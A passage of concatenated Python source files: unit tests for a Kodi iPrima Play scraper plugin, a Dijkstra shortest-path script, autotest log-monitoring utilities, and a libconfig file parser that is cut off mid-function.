        self.assertEqual(page.video_lists[0].link,
            'http://play.iprima.cz/prostreno-IX-9?season=p135603&sort[]=ord&sort[]=Rlatest')
        self.assertEqual(len(page.video_lists[0].item_list), 20)
        self.assertEqual(page.video_lists[0].item_list[0].title,
            u'Prostřeno! Sezóna 12: Epizoda 9')
        self.assertEqual(page.video_lists[0].item_list[0].link,
            'http://play.iprima.cz/prostreno/videa/prostreno-xii-9')
    def test_get_page__player_page_2(self):
        # Variant fixture with no splash image: image_url must be None.
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/cestovani-cervi-dirou-s-morganem-freemanem-ii-9')
        self.assertEqual(page.player.title, u'Cestování červí dírou s Morganem Freemanem II (7)')
        self.assertEqual(page.player.video_link,
            'http://prima-vod-prep.service.cdn.cra.cz/vod_Prima/_definst_/0001/4844/cze-ao-sd1-sd2-sd3-sd4-hd1-hd2.smil/playlist.m3u8')
        self.assertEqual(page.player.image_url, None)
    def test_get_page__homepage(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz')
        self.assertEqual(page.player, None)
        self.assertEqual(len(page.video_lists), 8)
        self.assertEqual(page.video_lists[1].title, u'Pořady a Seriály')
        self.assertEqual(page.video_lists[1].link, None)
        self.assertEqual(len(page.video_lists[1].item_list), 19)
        self.assertEqual(page.video_lists[1].item_list[0].title,
            u'Ohnivý kuře 32 Epizod')
        self.assertEqual(page.video_lists[1].item_list[0].link,
            'http://play.iprima.cz/ohnivy-kure')
        self.assertTrue(page.video_lists[1].item_list[0].description);
        self.assertEqual(len(page.filter_lists), 3)
        self.assertEqual(page.filter_lists[0].title, u'Žánr')
        self.assertEqual(len(page.filter_lists[0].item_list), 30)
        self.assertEqual(page.filter_lists[0].item_list[0].title, u'Akční')
        self.assertEqual(page.filter_lists[0].item_list[0].link,
            'http://play.iprima.cz?genres[]=p14198')
    def test_get_page__episodes(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/prostreno?cat[]=EPISODE&src=p14877&sort[]=Rord&sort[]=latest')
        self.assertEqual(page.player, None)
        self.assertEqual(len(page.video_lists), 1)
        self.assertEqual(page.video_lists[0].title, None)
        self.assertEqual(page.video_lists[0].link, None)
        self.assertEqual(page.video_lists[0].next_link,
            'https://play.iprima.cz/tdi/dalsi/prostreno?season=p14877&sort[]=Rord&sort[]=latest&offset=18')
        self.assertEqual(len(page.video_lists[0].item_list), 18)
        self.assertEqual(page.video_lists[0].item_list[0].title,
            u'Praha Sezóna 3: Epizoda 10')
        self.assertEqual(page.video_lists[0].item_list[0].link,
            'http://play.iprima.cz/prostreno-ix-10')
        self.assertEqual(len(page.filter_lists), 3)
        self.assertEqual(page.filter_lists[0].title, u'Řada')
        self.assertEqual(len(page.filter_lists[0].item_list), 11)
        self.assertEqual(page.filter_lists[0].item_list[0].title, u'Sezóna 1')
        self.assertEqual(page.filter_lists[0].item_list[0].link,
            'http://play.iprima.cz/prostreno?season=p14883&sort[]=Rord&sort[]=latest')
    def test_get_page__search(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/vysledky-hledani-vse?query=prostreno')
        self.assertEqual(page.player, None)
        self.assertEqual(len(page.video_lists), 3)
        self.assertEqual(page.video_lists[0].title, u'Mezi seriály')
        self.assertEqual(page.video_lists[0].link,
            'http://play.iprima.cz/vysledky-hledani?query=prostreno&searchGroup=SERIES')
        self.assertEqual(len(page.video_lists[0].item_list), 2)
        self.assertEqual(page.video_lists[0].item_list[0].title,
            u'VIP PROSTŘENO! 3 Řady , 32 Epizod')
        self.assertEqual(page.video_lists[0].item_list[0].link,
            'http://play.iprima.cz/vip-prostreno')
    def test_get_page__current_filters(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/prostreno')
        self.assertEqual(page.current_filters.link,
            'https://play.iprima.cz/tdi/filtr/zrusit/prostreno?availability=new&season=p14894')
        self.assertEqual(len(page.current_filters.item_list), 2)
        self.assertEqual(page.current_filters.item_list[0].title, u'Novinky')
        self.assertEqual(page.current_filters.item_list[0].link,
            'http://play.iprima.cz/prostreno?season=p14894&action=remove')
    def test_get_redirect_from_remove_link(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        self.assertEqual(prima_play.get_redirect_from_remove_link("http://play.iprima.cz/prostreno?season=p14894&action=remove"),
            'http://play.iprima.cz/prostreno')
    def test_Account_login(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        parser_account = PrimaPlay.Account( user, password, prima_play )
        self.assertEqual(parser_account.login(), True)
    def test_get_page__moje_play(self):
        prima_play = PrimaPlay.Parser(mockUserAgent(), mockTime())
        page = prima_play.get_page('http://play.iprima.cz/moje-play')
        self.assertEqual(page.player, None)
        self.assertEqual(len(page.video_lists), 1)
        self.assertEqual(page.video_lists[0].title, u'Moje oblíbené Spravovat oblíbené')
        self.assertEqual(page.video_lists[0].link, None)
        self.assertEqual(len(page.video_lists[0].item_list), 1)
        self.assertEqual(page.video_lists[0].item_list[0].title,
            u'Prostřeno! 13 Řad , 1023 Epizod')
        self.assertEqual(page.video_lists[0].item_list[0].link,
            'http://play.iprima.cz/prostreno')
        self.assertEqual(len(page.filter_lists), 0)
if __name__ == '__main__':
    # Allow running this test module directly as a script.
    unittest.main()
| alladdin/plugin.video.primaplay | libPrimaPlay/PrimaPlay_unittest.py | Python | gpl-2.0 | 12,829 |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 17 19:41:46 2015
@author: deep
"""
from graph import weightedGraph
import heapq
def djikstra(a, S):
    """Single-source shortest paths (Dijkstra with lazy heap deletion).

    Name kept (misspelled) for compatibility with existing callers.

    Args:
        a: graph whose adjLst[u] yields (weight, v) pairs.
        S: source vertex index.

    Returns:
        list of distances from S; unreachable vertices stay float('inf').

    Fixes the original's crash: it popped the heap in a "while True" loop
    without checking for emptiness, raising IndexError when only stale
    (already-visited) entries remained, e.g. on disconnected graphs with
    redundant edges.
    """
    N = len(a.adjLst)
    Visited = [False] * N
    Distance = [float('inf')] * N
    Distance[S] = 0
    heap = [(0, S)]
    while heap:
        dist_u, u = heapq.heappop(heap)
        if Visited[u]:
            continue  # stale entry superseded by a shorter path
        Visited[u] = True
        for weight_uv, v in a.adjLst[u]:
            if not Visited[v] and Distance[v] > dist_u + weight_uv:
                Distance[v] = dist_u + weight_uv
                heapq.heappush(heap, (Distance[v], v))
    print(Distance)
    return Distance
# Smoke test: 4-node weighted cycle, shortest paths from node 0.
g = weightedGraph(4)
g.addEdge(0,1,1)
g.addEdge(1,2,2)
g.addEdge(2,3,3)
g.addEdge(3,0,4)
djikstra(g,0)
| ddeepak6992/Algorithms | Graph/Dijkstra.py | Python | gpl-2.0 | 935 |
# Shared utility functions across monitors scripts.
import fcntl, os, re, select, signal, subprocess, sys, time
# Message logged when the monitored console connection drops.
TERM_MSG = 'Console connection unexpectedly lost. Terminating monitor.'
class Error(Exception):
    """Base class for errors raised by this module."""
    pass
class InvalidTimestampFormat(Error):
    """Raised when a timestamp format is neither a string nor a callable."""
    pass
def prepend_timestamp(msg, format):
    """Prepend timestamp to a message in a standard way.

    Args:
        msg: str; Message to prepend timestamp to.
        format: str or callable; Either format string that
            can be passed to time.strftime or a callable
            that will generate the timestamp string.

    Returns: str; 'timestamp\tmsg'

    Raises:
        InvalidTimestampFormat: If format is neither a string nor callable.
    """
    # isinstance (rather than the original exact "type(...) is str" test)
    # also accepts str subclasses; callable() covers functions, lambdas
    # and bound methods alike.
    if isinstance(format, str):
        timestamp = time.strftime(format, time.localtime())
    elif callable(format):
        timestamp = str(format())
    else:
        raise InvalidTimestampFormat
    return '%s\t%s' % (timestamp, msg)
def write_logline(logfile, msg, timestamp_format=None):
    """Write msg, possibly prepended with a timestamp, as a terminated line.

    Args:
        logfile: file; File object to .write() msg to.
        msg: str; Message to write.
        timestamp_format: str or callable; If specified will
            be passed into prepend_timestamp along with msg.
    """
    # Normalize away any trailing newlines so exactly one terminator goes out.
    text = msg.rstrip('\n')
    if timestamp_format:
        text = prepend_timestamp(text, timestamp_format)
    logfile.write(text + '\n')
def make_alert(warnfile, msg_type, msg_template, timestamp_format=None):
    """Create an alert generation function that writes to warnfile.

    Args:
        warnfile: file; File object to write msg's to.
        msg_type: str; String describing the message type
        msg_template: str; String template that function params
            are passed through.
        timestamp_format: str or callable; If specified will
            be passed into prepend_timestamp along with msg.

    Returns: function with a signature of (*params);
        The format for a warning used here is:
            %(timestamp)d\t%(msg_type)s\t%(status)s\n
    """
    if timestamp_format is None:
        # Default to an integer epoch timestamp.
        timestamp_format = lambda: int(time.time())

    def alert(*params):
        formatted_msg = msg_type + "\t" + msg_template % params
        timestamped_msg = prepend_timestamp(formatted_msg, timestamp_format)
        # 'print >> warnfile' was Python-2-only syntax; write() produces the
        # identical output (message plus trailing newline) on both versions.
        warnfile.write(timestamped_msg + '\n')
    return alert
def build_alert_hooks(patterns_file, warnfile):
    """Parse data in patterns file and transform into alert_hook list.

    Args:
        patterns_file: file; File to read alert pattern definitions from.
        warnfile: file; File to configure alert function to write warning to.

    Returns:
        list; Regex to alert function mapping.
            [(regex, alert_function), ...]
    """
    raw = patterns_file.readlines()
    # expected pattern format:
    # <msgtype> <newline> <regex> <newline> <alert> <newline> <newline>
    #   msgtype = a string categorizing the type of the message - used for
    #             enabling/disabling specific categories of warnings
    #   regex   = a python regular expression
    #   alert   = a string describing the alert message
    #             if the regex matches the line, this displayed warning will
    #             be the result of (alert % match.groups())
    # Every fourth line must be blank (the record separator).
    if any(sep.strip() for sep in raw[3::4]):
        raise ValueError('warning patterns are not separated by blank lines')
    hooks = []
    for msgtype, regex, alert in zip(raw[0::4], raw[1::4], raw[2::4]):
        compiled = re.compile(regex.rstrip('\n'))
        alert_function = make_alert(warnfile, msgtype.rstrip('\n'),
                                    alert.rstrip('\n'))
        hooks.append((compiled, alert_function))
    return hooks
def process_input(
    input, logfile, log_timestamp_format=None, alert_hooks=()):
    """Continuously read lines from input stream and:
    - Write them to log, possibly prefixed by timestamp.
    - Watch for alert patterns.

    Blocks until the input stream reaches EOF (0-length read).

    Args:
        input: file; Stream to read from.
        logfile: file; Log file to write to
        log_timestamp_format: str; Format to use for timestamping entries.
            No timestamp is added if None.
        alert_hooks: list; Generated from build_alert_hooks.
            [(regex, alert_function), ...]
    """
    while True:
        line = input.readline()
        if len(line) == 0:
            # this should only happen if the remote console unexpectedly
            # goes away. terminate this process so that we don't spin
            # forever doing 0-length reads off of input
            write_logline(logfile, TERM_MSG, log_timestamp_format)
            break
        if line == '\n':
            # If it's just an empty line we discard and continue.
            continue
        write_logline(logfile, line, log_timestamp_format)
        for regex, callback in alert_hooks:
            match = re.match(regex, line.strip())
            if match:
                # Alert callbacks receive the regex's captured groups.
                callback(*match.groups())
def lookup_lastlines(lastlines_dirpath, path):
    """Retrieve last lines seen for path.

    Open corresponding lastline file for path
    If there isn't one or isn't a match return None

    The lastlines file is consumed (deleted) by this call.

    Args:
        lastlines_dirpath: str; Dirpath to store lastlines files to.
        path: str; Filepath to source file that lastlines came from.

    Returns:
        int; Reverse line number of the last-seen position if found
        - Or -
        None; Otherwise
    """
    underscored = path.replace('/', '_')
    lastlines_path = os.path.join(lastlines_dirpath, underscored)
    try:
        lastlines_file = open(lastlines_path)
    except (OSError, IOError):
        return
    # Context managers guarantee the handles are closed even if read() fails
    # (the old code leaked the handle on any read error).
    with lastlines_file:
        lastlines = lastlines_file.read()
    os.remove(lastlines_path)
    if not lastlines:
        return
    try:
        target_file = open(path)
    except (OSError, IOError):
        return
    # Load it all in for now
    with target_file:
        target_data = target_file.read()
    # Get start loc in the target_data string, scanning from right
    loc = target_data.rfind(lastlines)
    if loc == -1:
        return
    # Then translate this into a reverse line number
    # (count newlines that occur afterward)
    reverse_lineno = target_data.count('\n', loc + len(lastlines))
    return reverse_lineno
def write_lastlines_file(lastlines_dirpath, path, data):
    """Write data to lastlines file for path.

    Args:
        lastlines_dirpath: str; Dirpath to store lastlines files to.
        path: str; Filepath to source file that data comes from.
        data: str; Content to record.

    Returns:
        str; Filepath that lastline data was written to.
    """
    underscored = path.replace('/', '_')
    dest_path = os.path.join(lastlines_dirpath, underscored)
    # Context manager closes (and flushes) the handle deterministically;
    # the old code relied on refcounting to close the anonymous file.
    with open(dest_path, 'w') as dest:
        dest.write(data)
    return dest_path
def nonblocking(pipe):
    """Switch *pipe* to non-blocking mode and return it.

    This allows us to take advantage of pipe.read()
    where we don't have to specify a buflen.

    Args:
        pipe: file; File object to modify

    Returns: pipe (the same object, now with O_NONBLOCK set)
    """
    current_flags = fcntl.fcntl(pipe, fcntl.F_GETFL)
    fcntl.fcntl(pipe, fcntl.F_SETFL, current_flags | os.O_NONBLOCK)
    return pipe
def launch_tails(follow_paths, lastlines_dirpath=None):
    """Launch a tail process for each follow_path.

    Args:
        follow_paths: list; Local file paths to follow.
        lastlines_dirpath: str; Optional dirpath of saved resume positions.

    Returns:
        tuple; (procs, pipes) or
            ({path: subprocess.Popen, ...}, {file: path, ...})
    """
    if lastlines_dirpath and not os.path.exists(lastlines_dirpath):
        os.makedirs(lastlines_dirpath)
    # --retry/--follow=name keep tailing across log rotation.
    tail_cmd = ('/usr/bin/tail', '--retry', '--follow=name')
    procs = {}  # path -> tail_proc
    pipes = {}  # tail_proc.stdout -> path
    for path in follow_paths:
        cmd = list(tail_cmd)
        if lastlines_dirpath:
            # Resume from where the previous run left off, if recorded.
            reverse_lineno = lookup_lastlines(lastlines_dirpath, path)
            if reverse_lineno is None:
                reverse_lineno = 1
            cmd.append('--lines=%d' % reverse_lineno)
        cmd.append(path)
        tail_proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
        procs[path] = tail_proc
        # Non-blocking stdout lets poll_tail_pipes() read without stalling.
        pipes[nonblocking(tail_proc.stdout)] = path
    return procs, pipes
def poll_tail_pipes(pipes, lastlines_dirpath=None, waitsecs=5):
    """Wait on tail pipes for new data for waitsecs, return any new lines.

    Args:
        pipes: dict; {subprocess.Popen: follow_path, ...}
        lastlines_dirpath: str; Path to write lastlines to.
        waitsecs: int; Timeout to pass to select

    Returns:
        tuple; (lines, bad_pipes) or ([line, ...], [subprocess.Popen, ...])
    """
    lines = []
    bad_pipes = []
    # Block until at least one is ready to read or waitsecs elapses
    ready, _, _ = select.select(pipes.keys(), (), (), waitsecs)
    for fi in ready:
        path = pipes[fi]
        # Pipes were set non-blocking by launch_tails(), so read() returns
        # whatever is currently buffered without stalling.
        data = fi.read()
        if len(data) == 0:
            # If no data, process is probably dead, add to bad_pipes
            bad_pipes.append(fi)
            continue
        if lastlines_dirpath:
            # Overwrite the lastlines file for this source path
            # Probably just want to write the last 1-3 lines.
            write_lastlines_file(lastlines_dirpath, path, data)
        for line in data.splitlines():
            # Tag each line with its originating path before merging.
            lines.append('[%s]\t%s\n' % (path, line))
    return lines, bad_pipes
def snuff(subprocs):
    """Kill (SIGKILL) and reap any subprocesses that are still running.

    Args:
        subprocs: list; [subprocess.Popen, ...]
    """
    for proc in subprocs:
        if proc.poll() is not None:
            continue  # already exited; nothing to do
        os.kill(proc.pid, signal.SIGKILL)
        proc.wait()
def follow_files(follow_paths, outstream, lastlines_dirpath=None, waitsecs=5):
    """Launch tail on a set of files and merge their output into outstream.

    Runs until every tail pipe has gone bad (EOF'd), then kills any
    remaining tail processes.

    Args:
        follow_paths: list; Local paths to launch tail on.
        outstream: file; Output stream to write aggregated lines to.
        lastlines_dirpath: Local dirpath to record last lines seen in.
        waitsecs: int; Timeout for poll_tail_pipes.
    """
    procs, pipes = launch_tails(follow_paths, lastlines_dirpath)
    while pipes:
        lines, bad_pipes = poll_tail_pipes(pipes, lastlines_dirpath, waitsecs)
        for bad in bad_pipes:
            pipes.pop(bad)
        try:
            outstream.writelines(['\n'] + lines)
            outstream.flush()
        # 'except (IOError, OSError), e:' was Python-2-only syntax (a py3
        # SyntaxError); the bound exception was unused anyway.
        except (IOError, OSError):
            # Something is wrong. Stop looping.
            break
    snuff(procs.values())
| yochow/autotest | server/hosts/monitors/monitors_util.py | Python | gpl-2.0 | 10,543 |
#!/usr/bin/python
from __future__ import absolute_import, division, print_function
import sys
import os
import codecs
import collections
import io
import re
# Define an isstr() and isint() that work on both Python2 and Python3.
# See http://stackoverflow.com/questions/11301138
try:
    basestring  # attempt to evaluate basestring
    # Python 2: text may be str or unicode (both subclass basestring),
    # and integers may be int or long.
    def isstr(s):
        return isinstance(s, basestring)
    def isint(i):
        return isinstance(i, (int, long))
except NameError:
    # Python 3: a single str type and a single int type.
    def isstr(s):
        return isinstance(s, str)
    def isint(i):
        return isinstance(i, int)
# Bounds to determine when an "L" suffix should be used during dump().
SMALL_INT_MIN = -2**31
SMALL_INT_MAX = 2**31 - 1
ESCAPE_SEQUENCE_RE = re.compile(r'''
( \\x.. # 2-digit hex escapes
| \\[\\'"abfnrtv] # Single-character escapes
)''', re.UNICODE | re.VERBOSE)
SKIP_RE = re.compile(r'\s+|#.*$|//.*$|/\*(.|\n)*?\*/', re.MULTILINE)
UNPRINTABLE_CHARACTER_RE = re.compile(r'[\x00-\x1F\x7F]')
# load() logic
##############
def decode_escapes(s):
    '''Unescape libconfig string literals

    Each escape sequence matched by ESCAPE_SEQUENCE_RE is decoded with
    Python's 'unicode-escape' codec; all other text passes through.
    '''
    return ESCAPE_SEQUENCE_RE.sub(
        lambda m: codecs.decode(m.group(0), 'unicode-escape'),
        s)
class AttrDict(collections.OrderedDict):
    '''OrderedDict subclass giving access to string keys via attribute access

    This class derives from collections.OrderedDict. Thus, the original
    order of the config entries in the input stream is maintained.

    Once a key exists, re-assigning it to a value of a different type
    raises AttributeError (types of existing settings are frozen).
    '''
    def __getattr__(self, attr):
        if attr == '_OrderedDict__root':
            # Work around Python2's OrderedDict weirdness.
            raise AttributeError("AttrDict has no attribute %r" % attr)
        return self.__getitem__(attr)

    def __setitem__(self, name, value):
        d = self
        if name in d:
            otype = type(d[name])
            ntype = type(value)
            if otype is not ntype:
                msg = "cannot set '%s' to '%s', expecting type: '%s', given '%s'" % \
                    (name, str(value), otype.__name__, ntype.__name__)
                raise AttributeError(msg)
        # Explicit two-argument super keeps this working on Python 2 as well;
        # bare super() is Python-3-only, while the rest of this module
        # (basestring shim above) explicitly supports Python 2.
        super(AttrDict, self).__setitem__(name, value)

    def __setattr__(self, name, value):
        self[name] = value
# Parse errors derive from RuntimeError, serialization errors from
# TypeError, so existing callers catching those builtins keep working.
class ConfigParseError(RuntimeError):
    '''Exception class raised on errors reading the libconfig input'''
    pass
class ConfigSerializeError(TypeError):
    '''Exception class raised on errors serializing a config object'''
    pass
class Token(object):
    '''Base class for all tokens produced by the libconf tokenizer

    A token records its type tag, its raw source text, and the position
    (filename, row, column) where it was read, for use in error messages.
    '''
    def __init__(self, type, text, filename, row, column):
        self.type = type
        self.text = text
        self.filename = filename
        self.row = row
        self.column = column

    def __str__(self):
        return '{!r} in {!r}, row {:d}, column {:d}'.format(
            self.text, self.filename, self.row, self.column)
class FltToken(Token):
    '''Token subclass for floating point values'''
    def __init__(self, *args, **kwargs):
        super(FltToken, self).__init__(*args, **kwargs)
        self.value = float(self.text)

class IntToken(Token):
    '''Token subclass for integral values'''
    def __init__(self, *args, **kwargs):
        super(IntToken, self).__init__(*args, **kwargs)
        # An 'L'/'LL' suffix marks a 64-bit literal in libconfig syntax.
        self.is_long = self.text.endswith('L')
        # text[1:2] is 'x'/'X' for hex literals ('0x...'); slicing (rather
        # than indexing) avoids IndexError on one-character tokens.
        self.is_hex = (self.text[1:2].lower() == 'x')
        # base 0 lets int() honor the '0x' prefix automatically.
        self.value = int(self.text.rstrip('L'), 0)

class BoolToken(Token):
    '''Token subclass for booleans'''
    def __init__(self, *args, **kwargs):
        super(BoolToken, self).__init__(*args, **kwargs)
        # The tokenizer only matches true/false (case-insensitive), so
        # checking the first letter is sufficient.
        self.value = (self.text[0].lower() == 't')

class StrToken(Token):
    '''Token subclass for strings'''
    def __init__(self, *args, **kwargs):
        super(StrToken, self).__init__(*args, **kwargs)
        # Strip the surrounding quotes, then resolve backslash escapes.
        self.value = decode_escapes(self.text[1:-1])
def compile_regexes(token_map):
    '''Compile the regex member of each (class, type, regex) triple'''
    compiled = []
    for cls, type, regex in token_map:
        compiled.append((cls, type, re.compile(regex)))
    return compiled
class Tokenizer:
    '''Tokenize an input string

    Typical usage:
        tokens = list(Tokenizer("<memory>").tokenize("""a = 7; b = ();"""))

    The filename argument to the constructor is used only in error messages, no
    data is loaded from the file. The input data is received as argument to the
    tokenize function, which yields tokens or throws a ConfigParseError on
    invalid input.

    Include directives are not supported, they must be handled at a higher
    level (cf. the TokenStream class).
    '''
    # Ordered token table: the first matching entry wins, so more specific
    # patterns precede their prefixes (hex64 before hex, integer64 before
    # integer, float before integer via its mandatory '.'/exponent).
    token_map = compile_regexes([
        (FltToken, 'float', r'([-+]?(\d+)?\.\d*([eE][-+]?\d+)?)|'
                            r'([-+]?(\d+)(\.\d*)?[eE][-+]?\d+)'),
        (IntToken, 'hex64', r'0[Xx][0-9A-Fa-f]+(L(L)?)'),
        (IntToken, 'hex', r'0[Xx][0-9A-Fa-f]+'),
        (IntToken, 'integer64', r'[-+]?[0-9]+L(L)?'),
        (IntToken, 'integer', r'[-+]?[0-9]+'),
        (BoolToken, 'boolean', r'(?i)(true|false)\b'),
        (StrToken, 'string', r'"([^"\\]|\\.)*"'),
        (Token, 'name', r'[A-Za-z\*][-A-Za-z0-9_\*]*'),
        (Token, '}', r'\}'),
        (Token, '{', r'\{'),
        (Token, ')', r'\)'),
        (Token, '(', r'\('),
        (Token, ']', r'\]'),
        (Token, '[', r'\['),
        (Token, ',', r','),
        (Token, ';', r';'),
        (Token, '=', r'='),
        (Token, ':', r':'),
    ])

    def __init__(self, filename):
        # 1-based position tracking, used only for error reporting.
        self.filename = filename
        self.row = 1
        self.column = 1

    def tokenize(self, string):
        '''Yield tokens from the input string or throw ConfigParseError'''
        pos = 0
        while pos < len(string):
            # First consume whitespace and comments, updating row/column.
            m = SKIP_RE.match(string, pos=pos)
            if m:
                skip_lines = m.group(0).split('\n')
                if len(skip_lines) > 1:
                    # Newlines were skipped: advance the row count and reset
                    # the column to just past the last newline.
                    self.row += len(skip_lines) - 1
                    self.column = 1 + len(skip_lines[-1])
                else:
                    self.column += len(skip_lines[0])
                pos = m.end()
                continue
            for cls, type, regex in self.token_map:
                m = regex.match(string, pos=pos)
                if m:
                    yield cls(type, m.group(0),
                              self.filename, self.row, self.column)
                    self.column += len(m.group(0))
                    pos = m.end()
                    break
            else:
                # for-else: no token pattern matched at this position.
                raise ConfigParseError(
                    "Couldn't load config in %r row %d, column %d: %r" %
                    (self.filename, self.row, self.column,
                     string[pos:pos+20]))
class TokenStream:
    '''Offer a parsing-oriented view on tokens

    Provide several methods that are useful to parsers, like ``accept()``,
    ``expect()``, ...

    The ``from_file()`` method is the preferred way to read input files, as
    it handles include directives, which the ``Tokenizer`` class does not do.
    '''
    def __init__(self, tokens):
        self.position = 0
        self.tokens = list(tokens)

    @classmethod
    def from_file(cls, f, filename=None, includedir='', seenfiles=None):
        '''Create a token stream by reading an input file

        Read tokens from `f`. If an include directive ('@include "file.cfg"')
        is found, read its contents as well.

        The `filename` argument is used for error messages and to detect
        circular imports. ``includedir`` sets the lookup directory for included
        files. ``seenfiles`` is used internally to detect circular includes,
        and should normally not be supplied by users of this function.
        '''
        if filename is None:
            filename = getattr(f, 'name', '<unknown>')
        if seenfiles is None:
            seenfiles = set()
        if filename in seenfiles:
            raise ConfigParseError("Circular include: %r" % (filename,))
        # Copy seenfiles, don't alter it.  (This line previously read
        # ``seenfiles | (unknown)``, which raised NameError for every file;
        # the current file's name must be added for cycle detection.)
        seenfiles = seenfiles | {filename}
        tokenizer = Tokenizer(filename=filename)
        lines = []
        tokens = []
        for line in f:
            m = re.match(r'@include "(.*)"$', line.strip())
            if m:
                # Flush everything before the directive, then substitute the
                # directive line with blanks so row numbers stay correct.
                tokens.extend(tokenizer.tokenize(''.join(lines)))
                lines = [re.sub(r'\S', ' ', line)]
                includefilename = decode_escapes(m.group(1))
                includefilename = os.path.join(includedir, includefilename)
                try:
                    includefile = open(includefilename, "r")
                except IOError:
                    raise ConfigParseError("Could not open include file %r" %
                                           (includefilename,))
                with includefile:
                    includestream = cls.from_file(includefile,
                                                  filename=includefilename,
                                                  includedir=includedir,
                                                  seenfiles=seenfiles)
                tokens.extend(includestream.tokens)
            else:
                lines.append(line)
        tokens.extend(tokenizer.tokenize(''.join(lines)))
        return cls(tokens)

    def peek(self):
        '''Return (but do not consume) the next token

        At the end of input, ``None`` is returned.
        '''
        if self.position >= len(self.tokens):
            return None
        return self.tokens[self.position]

    def accept(self, *args):
        '''Consume and return the next token if it has the correct type

        Multiple token types (as strings, e.g. 'integer64') can be given
        as arguments. If the next token is one of them, consume and return it.

        If the token type doesn't match, return None.
        '''
        token = self.peek()
        if token is None:
            return None
        for arg in args:
            if token.type == arg:
                self.position += 1
                return token
        return None

    def expect(self, *args):
        '''Consume and return the next token if it has the correct type

        Multiple token types (as strings, e.g. 'integer64') can be given
        as arguments. If the next token is one of them, consume and return it.

        If the token type doesn't match, raise a ConfigParseError.
        '''
        t = self.accept(*args)
        if t is not None:
            return t
        self.error("expected: %r" % (args,))

    def error(self, msg):
        '''Raise a ConfigParseError at the current input position'''
        if self.finished():
            raise ConfigParseError("Unexpected end of input; %s" % (msg,))
        else:
            t = self.peek()
            raise ConfigParseError("Unexpected token %s; %s" % (t, msg))

    def finished(self):
        '''Return ``True`` if the end of the token stream is reached.'''
        return self.position >= len(self.tokens)
class Parser:
    '''Recursive descent parser for libconfig files

    Takes a ``TokenStream`` as input, the ``parse()`` method then returns
    the config file data in a ``json``-module-style format.

    Grammar methods return the parsed value, or None when their production
    does not match at the current position.
    '''
    def __init__(self, tokenstream):
        self.tokens = tokenstream

    def parse(self):
        return self.configuration()

    def configuration(self):
        # Top level: a setting list that must consume the whole stream.
        result = self.setting_list_or_empty()
        if not self.tokens.finished():
            raise ConfigParseError("Expected end of input but found %s" %
                                   (self.tokens.peek(),))
        return result

    def setting_list_or_empty(self):
        result = AttrDict()
        while True:
            s = self.setting()
            if s is None:
                return result
            result[s[0]] = s[1]

    def setting(self):
        # setting := name (':'|'=') value [';'|','] ; separator is optional.
        name = self.tokens.accept('name')
        if name is None:
            return None
        self.tokens.expect(':', '=')
        value = self.value()
        if value is None:
            self.tokens.error("expected a value")
        self.tokens.accept(';', ',')
        return (name.text, value)

    def value(self):
        acceptable = [self.scalar_value, self.array, self.list, self.group]
        return self._parse_any_of(acceptable)

    def scalar_value(self):
        # This list is ordered so that more common tokens are checked first.
        acceptable = [self.string, self.boolean, self.integer, self.float,
                      self.hex, self.integer64, self.hex64]
        return self._parse_any_of(acceptable)

    def value_list_or_empty(self):
        # libconfig lists map to Python tuples, arrays to Python lists.
        return tuple(self._comma_separated_list_or_empty(self.value))

    def scalar_value_list_or_empty(self):
        return self._comma_separated_list_or_empty(self.scalar_value)

    def array(self):
        return self._enclosed_block('[', self.scalar_value_list_or_empty, ']')

    def list(self):
        return self._enclosed_block('(', self.value_list_or_empty, ')')

    def group(self):
        return self._enclosed_block('{', self.setting_list_or_empty, '}')

    def boolean(self):
        return self._create_value_node('boolean')

    def integer(self):
        return self._create_value_node('integer')

    def integer64(self):
        return self._create_value_node('integer64')

    def hex(self):
        return self._create_value_node('hex')

    def hex64(self):
        return self._create_value_node('hex64')

    def float(self):
        return self._create_value_node('float')

    def string(self):
        # Adjacent string literals are concatenated, C-style.
        t_first = self.tokens.accept('string')
        if t_first is None:
            return None
        values = [t_first.value]
        while True:
            t = self.tokens.accept('string')
            if t is None:
                break
            values.append(t.value)
        return ''.join(values)

    def _create_value_node(self, tokentype):
        # Accept a single token of tokentype and return its decoded value.
        t = self.tokens.accept(tokentype)
        if t is None:
            return None
        return t.value

    def _parse_any_of(self, nonterminals):
        # Return the first nonterminal that matches, else None.
        for fun in nonterminals:
            result = fun()
            if result is not None:
                return result
        return None

    def _comma_separated_list_or_empty(self, nonterminal):
        values = []
        first = True
        while True:
            v = nonterminal()
            if v is None:
                if first:
                    return []
                else:
                    # A comma was consumed, so a value must follow.
                    self.tokens.error("expected value after ','")
            values.append(v)
            if not self.tokens.accept(','):
                return values
            first = False

    def _enclosed_block(self, start, nonterminal, end):
        # start/end are single-character token types like '(' and ')'.
        if not self.tokens.accept(start):
            return None
        result = nonterminal()
        self.tokens.expect(end)
        return result
def load(f, filename=None, includedir=''):
    '''Load the contents of ``f`` (a file-like object) to a Python object

    The returned object is a subclass of ``dict`` that exposes string keys as
    attributes as well.

    Example:
        >>> with open('test/example.cfg') as f:
        ...     config = uconf.load(f)
        >>> config['window']['title']
        'libconfig example'
        >>> config.window.title
        'libconfig example'
    '''
    # Reading zero bytes cheaply distinguishes binary from text streams
    # without consuming any input.
    if isinstance(f.read(0), bytes):
        # Typo fix: the message previously read "must by unicode".
        raise TypeError("uconf.load() input file must be unicode")
    tokenstream = TokenStream.from_file(f,
                                        filename=filename,
                                        includedir=includedir)
    return Parser(tokenstream).parse()
def loads(string, filename=None, includedir=''):
    '''Load the contents of ``string`` to a Python object

    The returned object is a subclass of ``dict`` that exposes string keys as
    attributes as well.

    Example:
        >>> config = uconf.loads('window: { title: "libconfig example"; };')
        >>> config['window']['title']
        'libconfig example'
        >>> config.window.title
        'libconfig example'
    '''
    try:
        f = io.StringIO(string)
    except TypeError:
